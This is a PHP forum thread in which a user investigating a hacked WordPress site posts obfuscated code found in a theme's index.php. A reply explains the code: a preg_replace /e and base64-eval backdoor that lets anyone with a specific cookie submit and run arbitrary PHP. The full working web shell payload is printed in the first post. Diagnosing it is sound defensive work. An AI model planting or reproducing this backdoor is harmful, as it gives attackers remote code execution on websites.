Strange PHP code in Wordpress theme

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
User avatar
mecha_godzilla
Forum Contributor
Posts: 375
Joined: Wed Apr 14, 2010 4:45 pm
Location: UK

Strange PHP code in Wordpress theme

Post by mecha_godzilla »

Hi,

A friend of mine's WordPress site got hacked recently and I'm going through all the files to try and work out what happened. I won't mention the theme in question here but there are four suspect files - three of them are JavaScripts that have had document.write() appended to them to load in 3rd party sites into an iframe in the main template but the fourth file (index.php) has the following code right at the top:

Code: Select all

preg_replace("/.+/esi","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkge2VjaG8gJzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIGV2YWwoJGQpOyBlY2hvICc8L3RleHRhcmVhPic7fQ0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0Pjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjggbmFtZT1jPjwvdGV4dGFyZWE+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdD48L2Zvcm0+JztleGl0O30='\x29\x29\x3B",'1');
Anyone have any idea how to "decode" this, or work out what it's doing?

Thanks in advance,

Mecha Godzilla
User avatar
requinix
Spammer :|
Posts: 6617
Joined: Wed Oct 15, 2008 2:35 am
Location: WA, USA

Re: Strange PHP code in Wordpress theme

Post by requinix »

The /e flag tells preg_replace() to evaluate the replacement string as PHP code. That's the first warning that it's malicious.

There's only two layers of obfuscation, the second being a common eval(base64_decode(...)). The result is something which allows someone with $_COOKIE["v"] == "d" to see a form which allows them to submit and evaluate PHP code.
User avatar
mecha_godzilla
Forum Contributor
Posts: 375
Joined: Wed Apr 14, 2010 4:45 pm
Location: UK

Re: Strange PHP code in Wordpress theme

Post by mecha_godzilla »

Ok, that sounds about as ominous as I was expecting :mrgreen:

Thanks for your help,

M_G
Post Reply